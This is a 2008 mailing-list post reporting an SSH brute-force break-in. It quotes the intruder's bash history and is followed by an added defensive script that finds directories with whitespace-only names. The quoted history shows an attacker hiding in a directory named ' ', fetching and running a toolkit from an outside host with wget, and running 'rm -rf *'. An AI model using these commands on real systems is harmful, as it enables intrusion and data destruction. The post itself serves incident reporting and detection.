[K12OSN] OT: Break-In report
Rob Owens
rob.owens at biochemfluidics.com
Wed Jan 2 13:52:58 UTC 2008
I thought you guys might be interested in seeing the tracks of a
computer break-in. I won't say whose system it was (to protect the
embarrassed), but the break-in was nothing but a brute-force ssh attempt
at guessing usernames and passwords. A regular user account was
compromised and here is his bash history:
> ls
> cd who
> ls
> exit
> w
> cd /var/tmp
> ls -a
> cd "
> mkdir " "
> cd " "
> wget quest.dif.jp/x.tgz
> tar zxvf x.tgz
> cd x
> ./start dbdb
> cd ..
> ls -a
> rm -rf *
> passwd
> ls -a
> ps aux
> ps aux | grep dan (note: the hacked user account was "dan")
> top
> who
> exit
I particularly like the use of " " as a directory name. Nice and
invisible. Also note that the invader put his files in two directories
which have the "sticky" bit set: /dev/shm and /var/tmp
In the end, it seems that all the invader succeeded in doing was a bunch
of port-scanning. The OS is going to be re-installed anyway, just to be
safe.
Are there any organizations out there that this should be reported to?
(For instance, the way one might send reports to an antivirus group or a
content filtering group).
-Rob
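The trick Rob points out above, a directory named " " that a casual ls in /var/tmp will not reveal, is easy to hunt for. The script below is an added example, not code from the post or from the compromised system: it walks the world-writable sticky directories an intruder typically uses and reports any entry whose name consists only of whitespace. The directory list (/tmp, /var/tmp, /dev/shm) and the scratch tree it builds for the demonstration are assumptions constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original post): find directories or files
# whose name is nothing but whitespace, the hiding trick used in the
# break-in above. Run it against the sticky-bit directories an intruder
# would use, e.g.:  find_whitespace_names /tmp /var/tmp /dev/shm
# (those paths are assumptions; adjust for the host being examined).

# Print every entry up to two levels below the given directories whose
# basename is made up only of spaces and tabs. IFS= and read -r keep the
# trailing whitespace in the path intact so the name is not lost.
find_whitespace_names() {
    find "$@" -mindepth 1 -maxdepth 2 2>/dev/null | while IFS= read -r path; do
        base=${path##*/}
        # Remove all spaces and tabs; if nothing is left, the name was all whitespace.
        stripped=$(printf '%s' "$base" | tr -d ' \t')
        if [ -z "$stripped" ]; then
            printf '%s\n' "$path"
        fi
    done
}

# Constructed demo tree (assumption, not real evidence): a " " directory
# holding an unpacked "x" toolkit next to an innocent directory, mimicking
# what was left in /var/tmp on the compromised machine.
demo_tree() {
    scratch=$(mktemp -d)
    mkdir -p "$scratch/ " "$scratch/ /x" "$scratch/legit"
    : > "$scratch/ /x/start"
    : > "$scratch/legit/notes.txt"
    printf '%s\n' "$scratch"
}

# Build the demo tree, count the whitespace-named entries found, clean up.
# Only the " " directory itself should match; "x" and "legit" should not.
demo_count() {
    root=$(demo_tree)
    n=$(find_whitespace_names "$root" | wc -l | tr -d ' ')
    rm -rf "$root"
    printf '%s\n' "$n"
}
```

The whitespace check is done on the basename rather than with a find -name pattern so that names made of several spaces, or of tabs, are caught as well as the single-space name seen in this history. Pair it with a check for files owned by ordinary users under those directories (find /var/tmp /dev/shm -not -user root -ls) to spot dropped toolkits whose directory names are not hidden at all.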